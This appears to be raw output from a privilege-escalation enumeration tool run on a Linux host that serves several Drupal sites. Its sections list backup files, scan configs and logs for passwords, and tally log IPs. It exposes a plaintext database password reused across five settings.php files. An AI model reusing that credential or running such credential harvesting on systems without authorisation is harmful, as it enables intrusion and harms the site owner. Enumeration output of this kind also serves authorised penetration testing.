-rw-r--r-- 1 root root 0 Jan 18  2023 /home/daoud/drupal-10.0.2/core/modules/system/tests/fixtures/HtaccessTest/.htaccess
-rw-r--r-- 1 root root 413 Jan 18  2023 /home/daoud/drupal-10.0.2/core/.eslintrc.passing.json
-rw-r--r-- 1 root root 1824 Jan 18  2023 /home/daoud/drupal-10.0.2/core/.deprecation-ignore.txt
-rw-r--r-- 1 root root 1187 Jan 18  2023 /home/daoud/drupal-10.0.2/core/.eslintrc.json
-rw-r--r-- 1 root root 46 Jan 18  2023 /home/daoud/drupal-10.0.2/core/tests/Drupal/Tests/Composer/Plugin/Scaffold/fixtures/drupal-assets-fixture/assets/.htaccess
-rw-r--r-- 1 root root 55 Jan 18  2023 /home/daoud/drupal-10.0.2/core/tests/Drupal/Tests/Composer/Plugin/Scaffold/fixtures/drupal-assets-fixture/assets/.eslintrc.json
-rw-r--r-- 1 root root 50 Jan 18  2023 /home/daoud/drupal-10.0.2/core/tests/Drupal/Tests/Composer/Plugin/Scaffold/fixtures/drupal-assets-fixture/assets/.eslintignore
-rw-r--r-- 1 root root 47 Jan 18  2023 /home/daoud/drupal-10.0.2/core/tests/Drupal/Tests/Composer/Plugin/Scaffold/fixtures/drupal-assets-fixture/assets/.csslintrc
-rw-r--r-- 1 root root 50 Jan 18  2023 /home/daoud/drupal-10.0.2/core/tests/Drupal/Tests/Composer/Plugin/Scaffold/fixtures/drupal-assets-fixture/assets/.editorconfig
-rw-r--r-- 1 root root 58 Jan 18  2023 /home/daoud/drupal-10.0.2/core/tests/Drupal/Tests/Composer/Plugin/Scaffold/fixtures/drupal-assets-fixture/assets/.ht.router.php
-rw-r--r-- 1 root root 12861 Jan 18  2023 /home/daoud/drupal-10.0.2/core/.stylelintrc.json
-rw-r--r-- 1 root root 1351 Jan 18  2023 /home/daoud/drupal-10.0.2/core/.eslintrc.jquery.json
-rw-r--r-- 1 root root 433 Jan 18  2023 /home/daoud/drupal-10.0.2/core/.stylelintignore
-rw-r--r-- 1 root root 550 Jan 18  2023 /home/daoud/drupal-10.0.2/core/.eslintignore
-rw-r--r-- 1 root root 1799 Jan 18  2023 /home/daoud/drupal-10.0.2/core/.cspell.json
-rw-r--r-- 1 root root 216 Jan 18  2023 /home/daoud/drupal-10.0.2/core/.prettierignore

╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rw-r--r-- 1 root root 1921 Jan 31 06:38 /var/backups/alternatives.tar.2.gz
-rw-r--r-- 1 root root 1923 Dec 31 06:38 /var/backups/alternatives.tar.5.gz
-rw-r--r-- 1 root root 32 Oct  8 06:38 /var/backups/dpkg.arch.4.gz
-rw-r--r-- 1 root root 1921 Jan  8 06:38 /var/backups/alternatives.tar.4.gz
-rw-r--r-- 1 root root 32 Oct  5 06:38 /var/backups/dpkg.arch.5.gz
-rw-r--r-- 1 root root 32 Sep 24 06:38 /var/backups/dpkg.arch.6.gz
-rw-r--r-- 1 root root 1921 Jan  9 06:38 /var/backups/alternatives.tar.3.gz
-rw-r--r-- 1 root root 1922 Feb  3 06:38 /var/backups/alternatives.tar.1.gz
-rw-r--r-- 1 root root 32 Oct 12 06:38 /var/backups/dpkg.arch.2.gz
-rw-r--r-- 1 root root 1922 Dec 20 06:38 /var/backups/alternatives.tar.6.gz
-rw-r--r-- 1 root root 0 Dec  3 06:38 /var/backups/dpkg.arch.0
-rw-r--r-- 1 root root 40960 Feb 13 06:38 /var/backups/alternatives.tar.0
-rw-r--r-- 1 root root 32 Nov 30 06:38 /var/backups/dpkg.arch.1.gz
-rw-r--r-- 1 root root 32 Oct  9 06:38 /var/backups/dpkg.arch.3.gz

╔══════════╣ Searching passwords in history files

╔══════════╣ Searching passwords in config PHP files
/etc/apache2/conf-available/phpMyAdmin-5.2.0-all-languages/config.sample.inc.php:$cfg['Servers'][$i]['AllowNoPassword'] = false;
/etc/apache2/conf-available/phpMyAdmin-5.2.0-all-languages/libraries/config.default.php:$cfg['Servers'][$i]['AllowNoPassword'] = false;
/etc/apache2/conf-available/phpMyAdmin-5.2.0-all-languages/libraries/config.default.php:$cfg['ShowChgPassword'] = true;
/etc/phpmyadmin/config-db.php:$dbpass='';
/etc/phpmyadmin/config-db.php:$dbuser='';
/etc/phpmyadmin/config.inc.php:    // $cfg['Servers'][$i]['AllowNoPassword'] = TRUE;
/etc/phpmyadmin/config.inc.php:// $cfg['Servers'][$i]['AllowNoPassword'] = TRUE;
/home/daoud/lbcm/sites/default/settings.php:  'password' => 'mr43gh98',
/home/daoud/lbcm/sites/default/settings.php: *     'password' => 'sqlpassword',
/home/daoud/lbcm/sites/default/settings.php: *   'password' => 'sqlpassword',
/home/daoud/lbpo/sites/default/settings.php:  'password' => 'mr43gh98',
/home/daoud/lbpo/sites/default/settings.php: *     'password' => 'sqlpassword',
/home/daoud/lbpo/sites/default/settings.php: *   'password' => 'sqlpassword',
/home/daoud/ldb/sites/default/settings.php:  'password' => 'mr43gh98',
/home/daoud/ldb/sites/default/settings.php: *     'password' => 'sqlpassword',
/home/daoud/ldb/sites/default/settings.php: *   'password' => 'sqlpassword',
/home/daoud/lee/sites/default/settings.php:  'password' => 'mr43gh98',
/home/daoud/lee/sites/default/settings.php: *     'password' => 'sqlpassword',
/home/daoud/lee/sites/default/settings.php: *   'password' => 'sqlpassword',
/home/daoud/leve/sites/default/settings.php:  'password' => 'mr43gh98',
/home/daoud/leve/sites/default/settings.php: *     'password' => 'sqlpassword',
/home/daoud/leve/sites/default/settings.php: *   'password' => 'sqlpassword',

╔══════════╣ Searching *password* or *credential* files in home (limit 70)
/bin/systemd-ask-password
/bin/systemd-tty-ask-password-agent
/etc/apache2/conf-available/phpMyAdmin-5.2.0-all-languages/templates/server/privileges/change_password.twig
/etc/apache2/conf-available/phpMyAdmin-5.2.0-all-languages/templates/user_password.twig
/etc/apache2/conf-available/phpMyAdmin-5.2.0-all-languages/themes/bootstrap/img/password.svg
/etc/pam.d/common-password
/home/daoud/drupal-10.0.0/core/scripts/password-hash.sh
/home/daoud/drupal-10.0.0/core/themes/claro/css/components/form--password-confirm.css
/home/daoud/drupal-10.0.0/core/themes/claro/css/components/form--password-confirm.pcss.css
/home/daoud/drupal-10.0.2/core/scripts/password-hash.sh
/home/daoud/drupal-10.0.2/core/themes/claro/css/components/form--password-confirm.css
/home/daoud/drupal-10.0.2/core/themes/claro/css/components/form--password-confirm.pcss.css
/home/daoud/drupal-9.4.10/core/modules/user/tests/themes/password_theme_function_test
/home/daoud/drupal-9.4.10/core/modules/user/tests/themes/password_theme_function_test/js/password-theme-functions.es6.js
/home/daoud/drupal-9.4.10/core/modules/user/tests/themes/password_theme_function_test/js/password-theme-functions.js
/home/daoud/drupal-9.4.10/core/modules/user/tests/themes/password_theme_function_test/password_theme_function_test.info.yml
/home/daoud/drupal-9.4.10/core/modules/user/tests/themes/password_theme_function_test/password_theme_function_test.libraries.yml
/home/daoud/drupal-9.4.10/core/scripts/password-hash.sh
/home/daoud/drupal-9.4.10/core/themes/bartik/css/components/password-suggestions.css
/home/daoud/drupal-9.4.10/core/themes/claro/css/components/form--password-confirm.css
/home/daoud/drupal-9.4.10/core/themes/claro/css/components/form--password-confirm.pcss.css
/home/daoud/drupal-9.5.0/core/modules/user/tests/themes/password_theme_function_test
/home/daoud/drupal-9.5.0/core/modules/user/tests/themes/password_theme_function_test/js/password-theme-functions.es6.js
/home/daoud/drupal-9.5.0/core/modules/user/tests/themes/password_theme_function_test/js/password-theme-functions.js
/home/daoud/drupal-9.5.0/core/modules/user/tests/themes/password_theme_function_test/password_theme_function_test.info.yml
/home/daoud/drupal-9.5.0/core/modules/user/tests/themes/password_theme_function_test/password_theme_function_test.libraries.yml
/home/daoud/drupal-9.5.0/core/scripts/password-hash.sh
/home/daoud/drupal-9.5.0/core/themes/bartik/css/components/password-suggestions.css
/home/daoud/drupal-9.5.0/core/themes/claro/css/components/form--password-confirm.css
/home/daoud/drupal-9.5.0/core/themes/claro/css/components/form--password-confirm.pcss.css
/home/daoud/drupal-9.5.2/core/modules/user/tests/themes/password_theme_function_test
/home/daoud/drupal-9.5.2/core/modules/user/tests/themes/password_theme_function_test/js/password-theme-functions.es6.js
/home/daoud/drupal-9.5.2/core/modules/user/tests/themes/password_theme_function_test/js/password-theme-functions.js
/home/daoud/drupal-9.5.2/core/modules/user/tests/themes/password_theme_function_test/password_theme_function_test.info.yml
/home/daoud/drupal-9.5.2/core/modules/user/tests/themes/password_theme_function_test/password_theme_function_test.libraries.yml
/home/daoud/drupal-9.5.2/core/scripts/password-hash.sh
/home/daoud/drupal-9.5.2/core/themes/bartik/css/components/password-suggestions.css
/home/daoud/drupal-9.5.2/core/themes/claro/css/components/form--password-confirm.css
/home/daoud/drupal-9.5.2/core/themes/claro/css/components/form--password-confirm.pcss.css
/home/daoud/lbcm/core/modules/user/tests/themes/password_theme_function_test
/home/daoud/lbcm/core/modules/user/tests/themes/password_theme_function_test/js/password-theme-functions.es6.js
/home/daoud/lbcm/core/modules/user/tests/themes/password_theme_function_test/js/password-theme-functions.js
/home/daoud/lbcm/core/modules/user/tests/themes/password_theme_function_test/password_theme_function_test.info.yml
/home/daoud/lbcm/core/modules/user/tests/themes/password_theme_function_test/password_theme_function_test.libraries.yml
/home/daoud/lbcm/core/scripts/password-hash.sh
/home/daoud/lbcm/core/themes/bartik/css/components/password-suggestions.css
/home/daoud/lbcm/core/themes/claro/css/components/form--password-confirm.css
/home/daoud/lbcm/core/themes/claro/css/components/form--password-confirm.pcss.css
/home/daoud/lbpo/core/modules/user/tests/themes/password_theme_function_test
/home/daoud/lbpo/core/modules/user/tests/themes/password_theme_function_test/js/password-theme-functions.es6.js
/home/daoud/lbpo/core/modules/user/tests/themes/password_theme_function_test/js/password-theme-functions.js
/home/daoud/lbpo/core/modules/user/tests/themes/password_theme_function_test/password_theme_function_test.info.yml
/home/daoud/lbpo/core/modules/user/tests/themes/password_theme_function_test/password_theme_function_test.libraries.yml
/home/daoud/lbpo/core/scripts/password-hash.sh
/home/daoud/lbpo/core/themes/bartik/css/components/password-suggestions.css
/home/daoud/lbpo/core/themes/claro/css/components/form--password-confirm.css
/home/daoud/lbpo/core/themes/claro/css/components/form--password-confirm.pcss.css
/home/daoud/ldb/core/modules/user/tests/themes/password_theme_function_test
/home/daoud/ldb/core/modules/user/tests/themes/password_theme_function_test/js/password-theme-functions.es6.js
/home/daoud/ldb/core/modules/user/tests/themes/password_theme_function_test/js/password-theme-functions.js
/home/daoud/ldb/core/modules/user/tests/themes/password_theme_function_test/password_theme_function_test.info.yml
/home/daoud/ldb/core/modules/user/tests/themes/password_theme_function_test/password_theme_function_test.libraries.yml
/home/daoud/ldb/core/scripts/password-hash.sh
/home/daoud/ldb/core/themes/bartik/css/components/password-suggestions.css
/home/daoud/ldb/core/themes/claro/css/components/form--password-confirm.css
/home/daoud/ldb/core/themes/claro/css/components/form--password-confirm.pcss.css
/home/daoud/lee/core/modules/user/tests/themes/password_theme_function_test
/home/daoud/lee/core/modules/user/tests/themes/password_theme_function_test/js/password-theme-functions.es6.js
/home/daoud/lee/core/modules/user/tests/themes/password_theme_function_test/js/password-theme-functions.js
/home/daoud/lee/core/modules/user/tests/themes/password_theme_function_test/password_theme_function_test.info.yml

╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs

╔══════════╣ Searching IPs inside logs (limit 70)
   6340 193.194.89.177
    374 107.172.10.199
    172 170.64.162.195
    142 160.16.118.86
     70 137.184.170.8
     62 42.192.131.77
     62 161.35.78.86
     60 59.127.158.223
     60 51.142.182.209
     60 146.190.152.16
     58 20.141.110.74
     56 220.78.169.134
     54 31.220.3.140
     52 186.67.248.5
     48 220.88.1.208
     48 190.129.122.86
     48 170.106.159.93
     46 150.109.246.107
     44 85.192.41.225
     44 43.154.96.206
     42 46.41.140.43
     42 43.134.64.85
     42 40.86.81.214
     42 35.227.114.241
     42 138.197.102.26
     40 36.92.107.106
     40 170.106.199.89
     40 124.156.206.16
     38 81.17.25.50
     38 58.34.180.42
     38 49.232.250.235
     38 43.128.233.205
     38 200.52.65.31
     38 182.61.38.253
     38 124.137.205.60
     36 47.180.212.134
     36 47.180.114.229
     36 43.153.76.43
     36 43.134.72.174
     36 31.216.62.97
     36 178.22.168.219
     36 159.89.229.254
     36 14.63.162.98
     36 139.59.232.228
     36 136.228.161.67
     36 124.221.121.222
     36 122.154.32.14
     36 103.115.24.11
     34 43.163.198.125
     34 43.156.79.21
     34 43.156.122.96
     34 43.154.179.9
     34 43.153.216.43
     34 34.139.203.70
     34 27.118.22.191
     34 198.12.114.231
     34 188.166.47.99
     34 188.131.244.120
     34 187.109.253.246
     34 180.184.65.71
     34 180.184.139.166
     34 161.35.71.130
     34 152.136.126.53
     34 150.136.129.10
     34 13.201.192.92
     34 124.230.124.250
     34 123.140.114.196
     34 118.163.196.104
     34 104.249.156.179
     34 103.144.245.127

╔══════════╣ Searching passwords inside logs (limit 70)
Feb 12 09:29:30 labbio /etc/mysql/debian-start[317]: ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: NO)
Feb 12 09:29:30 labbio debian-start[326]: ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: NO)
Feb 12 09:29:30 labbio mariadbd[210]: 2024-02-12  9:29:30 3 [Warning] Access denied for user 'root'@'localhost' (using password: NO)
Feb 12 09:29:30 labbio mariadbd[210]: 2024-02-12  9:29:30 4 [Warning] Access denied for user 'root'@'localhost' (using password: NO)
Feb 12 12:29:08 labbio /etc/mysql/debian-start[319]: ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: NO)
Feb 12 12:29:08 labbio debian-start[331]: ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: NO)
Feb 12 12:29:08 labbio mariadbd[210]: 2024-02-12 12:29:08 3 [Warning] Access denied for user 'root'@'localhost' (using password: NO)
Feb 12 12:29:08 labbio mariadbd[210]: 2024-02-12 12:29:08 4 [Warning] Access denied for user 'root'@'localhost' (using password: NO)
Feb 13 21:21:28 labbio mariadbd[210]: 2024-02-13 21:21:28 747 [Warning] Access denied for user 'root'@'localhost' (using password: YES)
Feb 13 21:21:37 labbio mariadbd[210]: 2024-02-13 21:21:37 751 [Warning] Access denied for user 'root'@'localhost' (using password: YES)
Feb 13 21:21:52 labbio mariadbd[210]: 2024-02-13 21:21:52 756 [Warning] Access denied for user 'root'@'localhost' (using password: YES)
Feb 13 21:28:37 labbio mariadbd[210]: 2024-02-13 21:28:37 785 [Warning] Access denied for user 'root'@'localhost' (using password: YES)
Feb 13 21:36:03 labbio mariadbd[210]: 2024-02-13 21:36:03 816 [Warning] Access denied for user 'root'@'localhost' (using password: YES)
Feb 13 21:36:04 labbio mariadbd[210]: 2024-02-13 21:36:04 818 [Warning] Access denied for user 'root'@'localhost' (using password: YES)
Feb 13 21:36:18 labbio mariadbd[210]: 2024-02-13 21:36:18 821 [Warning] Access denied for user 'root'@'localhost' (using password: YES)
Feb 13 21:36:34 labbio mariadbd[210]: 2024-02-13 21:36:34 822 [Warning] Access denied for user 'root'@'localhost' (using password: YES)
Feb 13 21:37:34 labbio mariadbd[210]: 2024-02-13 21:37:34 823 [Warning] Access denied for user 'root'@'localhost' (using password: YES)
Feb 13 22:03:36 labbio mariadbd[210]: 2024-02-13 22:03:36 827 [Warning] Access denied for user 'root'@'localhost' (using password: YES)
Feb 13 22:05:29 labbio mariadbd[210]: 2024-02-13 22:05:29 828 [Warning] Access denied for user 'root'@'localhost' (using password: YES)
Feb 15 06:11:14 labbio mariadbd[210]: 2024-02-15  6:11:14 1003 [Warning] Access denied for user 'root'@'localhost' (using password: YES)
Feb 15 06:14:12 labbio mariadbd[210]: 2024-02-15  6:14:12 1015 [Warning] Access denied for user 'root'@'localhost' (using password: YES)
Feb 15 06:14:14 labbio mariadbd[210]: 2024-02-15  6:14:14 1020 [Warning] Access denied for user 'root'@'localhost' (using password: YES)
Feb 15 06:14:56 labbio mariadbd[210]: 2024-02-15  6:14:56 1031 [Warning] Access denied for user 'root'@'localhost' (using password: YES)
Feb 15 06:14:56 labbio mariadbd[210]: 2024-02-15  6:14:56 1035 [Warning] Access denied for user 'root'@'localhost' (using password: YES)
Feb 15 06:51:45 labbio mariadbd[210]: 2024-02-15  6:51:45 1057 [Warning] Access denied for user 'root'@'localhost' (using password: YES)
Feb 15 09:12:25 labbio mariadbd[210]: 2024-02-15  9:12:25 1081 [Warning] Access denied for user 'root'@'localhost' (using password: YES)
Feb 15 09:12:25 labbio mariadbd[210]: 2024-02-15  9:12:25 1082 [Warning] Access denied for user 'root'@'localhost' (using password: YES)
Feb 15 09:12:25 labbio mariadbd[210]: 2024-02-15  9:12:25 1083 [Warning] Access denied for user 'root'@'localhost' (using password: NO)

╔══════════╣ Searching emails inside logs (limit 70)

╔══════════╣ Searching possible password variables inside key folders (limit 140)
/home/daoud/drupal-10.0.0/core/includes/install.inc:228:    $mysql_database = $databases['mysql'];
/home/daoud/drupal-10.0.0/core/modules/workspaces/src/Entity/Workspace.php:179:    $deleted_workspace_ids = $state->get('workspace.deleted', []);
/home/daoud/drupal-10.0.0/core/modules/workspaces/src/Form/WorkspaceSwitcherForm.php:97:    $form['workspace_id'] = [
/home/daoud/drupal-10.0.0/core/modules/workspaces/src/WorkspaceManager.php:318:    $workspace_id = reset($deleted_workspace_ids);
/home/daoud/drupal-10.0.0/core/modules/workspaces/src/WorkspaceRepository.php:111:      foreach ($workspaces as $workspace_id => $workspace) {
/home/daoud/drupal-10.0.0/core/modules/workspaces/src/WorkspaceRepository.php:112:        $graph[$workspace_id]['edges'] = [];
/home/daoud/drupal-10.0.0/core/modules/workspaces/src/WorkspaceRepository.php:120:        $this->tree[$workspace_id] = [
/home/daoud/drupal-10.0.0/core/modules/workspaces/src/WorkspaceRepository.php:71:      foreach ($workspaces as $workspace_id => $workspace) {
/home/daoud/drupal-10.0.0/core/modules/workspaces/src/WorkspacesAliasRepository.php:45:      ':active_workspace_id' => $active_workspace->id(),
/home/daoud/drupal-10.0.2/core/includes/install.inc:228:    $mysql_database = $databases['mysql'];
/home/daoud/drupal-10.0.2/core/modules/workspaces/src/Entity/Workspace.php:179:    $deleted_workspace_ids = $state->get('workspace.deleted', []);
/home/daoud/drupal-10.0.2/core/modules/workspaces/src/Form/WorkspaceSwitcherForm.php:97:    $form['workspace_id'] = [
/home/daoud/drupal-10.0.2/core/modules/workspaces/src/WorkspaceManager.php:318:    $workspace_id = reset($deleted_workspace_ids);
/home/daoud/drupal-10.0.2/core/modules/workspaces/src/WorkspaceRepository.php:111:      foreach ($workspaces as $workspace_id => $workspace) {
/home/daoud/drupal-10.0.2/core/modules/workspaces/src/WorkspaceRepository.php:112:        $graph[$workspace_id]['edges'] = [];
/home/daoud/drupal-10.0.2/core/modules/workspaces/src/WorkspaceRepository.php:120:        $this->tree[$workspace_id] = [
/home/daoud/drupal-10.0.2/core/modules/workspaces/src/WorkspaceRepository.php:71:      foreach ($workspaces as $workspace_id => $workspace) {
/home/daoud/drupal-10.0.2/core/modules/workspaces/src/WorkspacesAliasRepository.php:45:      ':active_workspace_id' => $active_workspace->id(),
/home/daoud/drupal-9.4.10/core/includes/install.inc:228:    $mysql_database = $databases['mysql'];
/home/daoud/drupal-9.4.10/core/modules/workspaces/src/Entity/Workspace.php:179:    $deleted_workspace_ids = $state->get('workspace.deleted', []);
/home/daoud/drupal-9.4.10/core/modules/workspaces/src/Form/WorkspaceSwitcherForm.php:97:    $form['workspace_id'] = [
/home/daoud/drupal-9.4.10/core/modules/workspaces/src/WorkspaceManager.php:318:    $workspace_id = reset($deleted_workspace_ids);
/home/daoud/drupal-9.4.10/core/modules/workspaces/src/WorkspaceRepository.php:111:      foreach ($workspaces as $workspace_id => $workspace) {
/home/daoud/drupal-9.4.10/core/modules/workspaces/src/WorkspaceRepository.php:112:        $graph[$workspace_id]['edges'] = [];
/home/daoud/drupal-9.4.10/core/modules/workspaces/src/WorkspaceRepository.php:120:        $this->tree[$workspace_id] = [
/home/daoud/drupal-9.4.10/core/modules/workspaces/src/WorkspaceRepository.php:71:      foreach ($workspaces as $workspace_id => $workspace) {
/home/daoud/drupal-9.4.10/core/modules/workspaces/src/WorkspacesAliasRepository.php:45:      ':active_workspace_id' => $active_workspace->id(),
/home/daoud/drupal-9.4.10/vendor/symfony/http-kernel/DataCollector/ConfigDataCollector.php:66:            'app_name' => $this->name,
/home/daoud/drupal-9.5.0/core/includes/install.inc:228:    $mysql_database = $databases['mysql'];
/home/daoud/drupal-9.5.0/core/modules/workspaces/src/Entity/Workspace.php:179:    $deleted_workspace_ids = $state->get('workspace.deleted', []);
/home/daoud/drupal-9.5.0/core/modules/workspaces/src/Form/WorkspaceSwitcherForm.php:97:    $form['workspace_id'] = [
/home/daoud/drupal-9.5.0/core/modules/workspaces/src/WorkspaceManager.php:307:    $deleted_workspace_ids = $this->state->get('workspace.deleted', []);
/home/daoud/drupal-9.5.0/core/modules/workspaces/src/WorkspaceManager.php:318:    $workspace_id = reset($deleted_workspace_ids);
/home/daoud/drupal-9.5.0/core/modules/workspaces/src/WorkspaceRepository.php:111:      foreach ($workspaces as $workspace_id => $workspace) {
/home/daoud/drupal-9.5.0/core/modules/workspaces/src/WorkspaceRepository.php:112:        $graph[$workspace_id]['edges'] = [];
/home/daoud/drupal-9.5.0/core/modules/workspaces/src/WorkspaceRepository.php:120:        $this->tree[$workspace_id] = [
/home/daoud/drupal-9.5.0/core/modules/workspaces/src/WorkspaceRepository.php:71:      foreach ($workspaces as $workspace_id => $workspace) {
/home/daoud/drupal-9.5.0/core/modules/workspaces/src/WorkspacesAliasRepository.php:45:      ':active_workspace_id' => $active_workspace->id(),
/home/daoud/drupal-9.5.0/vendor/symfony/http-kernel/DataCollector/ConfigDataCollector.php:66:            'app_name' => $this->name,
/home/daoud/drupal-9.5.2/core/includes/install.inc:228:    $mysql_database = $databases['mysql'];
/home/daoud/drupal-9.5.2/core/modules/workspaces/src/Entity/Workspace.php:179:    $deleted_workspace_ids = $state->get('workspace.deleted', []);
/home/daoud/drupal-9.5.2/core/modules/workspaces/src/Form/WorkspaceSwitcherForm.php:97:    $form['workspace_id'] = [
/home/daoud/drupal-9.5.2/core/modules/workspaces/src/WorkspaceManager.php:307:    $deleted_workspace_ids = $this->state->get('workspace.deleted', []);
/home/daoud/drupal-9.5.2/core/modules/workspaces/src/WorkspaceManager.php:318:    $workspace_id = reset($deleted_workspace_ids);
/home/daoud/drupal-9.5.2/core/modules/workspaces/src/WorkspaceRepository.php:111:      foreach ($workspaces as $workspace_id => $workspace) {
/home/daoud/drupal-9.5.2/core/modules/workspaces/src/WorkspaceRepository.php:112:        $graph[$workspace_id]['edges'] = [];
/home/daoud/drupal-9.5.2/core/modules/workspaces/src/WorkspaceRepository.php:120:        $this->tree[$workspace_id] = [
/home/daoud/drupal-9.5.2/core/modules/workspaces/src/WorkspaceRepository.php:71:      foreach ($workspaces as $workspace_id => $workspace) {
/home/daoud/drupal-9.5.2/core/modules/workspaces/src/WorkspacesAliasRepository.php:45:      ':active_workspace_id' => $active_workspace->id(),
/home/daoud/drupal-9.5.2/vendor/symfony/http-kernel/DataCollector/ConfigDataCollector.php:66:            'app_name' => $this->name,
/home/daoud/lbcm/core/includes/install.inc:228:    $mysql_database = $databases['mysql'];
/home/daoud/lbcm/core/modules/workspaces/src/Entity/Workspace.php:179:    $deleted_workspace_ids = $state->get('workspace.deleted', []);
/home/daoud/lbcm/core/modules/workspaces/src/Form/WorkspaceSwitcherForm.php:97:    $form['workspace_id'] = [
/home/daoud/lbcm/core/modules/workspaces/src/WorkspaceManager.php:307:    $deleted_workspace_ids = $this->state->get('workspace.deleted', []);
/home/daoud/lbcm/core/modules/workspaces/src/WorkspaceManager.php:318:    $workspace_id = reset($deleted_workspace_ids);
/home/daoud/lbcm/core/modules/workspaces/src/WorkspaceRepository.php:111:      foreach ($workspaces as $workspace_id => $workspace) {
/home/daoud/lbcm/core/modules/workspaces/src/WorkspaceRepository.php:112:        $graph[$workspace_id]['edges'] = [];
/home/daoud/lbcm/core/modules/workspaces/src/WorkspaceRepository.php:120:        $this->tree[$workspace_id] = [
/home/daoud/lbcm/core/modules/workspaces/src/WorkspaceRepository.php:71:      foreach ($workspaces as $workspace_id => $workspace) {
/home/daoud/lbcm/core/modules/workspaces/src/WorkspacesAliasRepository.php:45:      ':active_workspace_id' => $active_workspace->id(),
/home/daoud/lbcm/vendor/doctrine/reflection/.github/workflows/release-on-milestone-closed.yml:13:      GIT_AUTHOR_NAME: ${{ secrets.GIT_AUTHOR_NAME }}
/home/daoud/lbcm/vendor/symfony/http-kernel/DataCollector/ConfigDataCollector.php:66:            'app_name' => $this->name,
/home/daoud/lbpo/core/includes/install.inc:228:    $mysql_database = $databases['mysql'];
/home/daoud/lbpo/core/modules/workspaces/src/Entity/Workspace.php:179:    $deleted_workspace_ids = $state->get('workspace.deleted', []);
/home/daoud/lbpo/core/modules/workspaces/src/Form/WorkspaceSwitcherForm.php:97:    $form['workspace_id'] = [
/home/daoud/lbpo/core/modules/workspaces/src/WorkspaceManager.php:307:    $deleted_workspace_ids = $this->state->get('workspace.deleted', []);
/home/daoud/lbpo/core/modules/workspaces/src/WorkspaceManager.php:318:    $workspace_id = reset($deleted_workspace_ids);
/home/daoud/lbpo/core/modules/workspaces/src/WorkspaceRepository.php:111:      foreach ($workspaces as $workspace_id => $workspace) {
/home/daoud/lbpo/core/modules/workspaces/src/WorkspaceRepository.php:112:        $graph[$workspace_id]['edges'] = [];
/home/daoud/lbpo/core/modules/workspaces/src/WorkspaceRepository.php:120:        $this->tree[$workspace_id] = [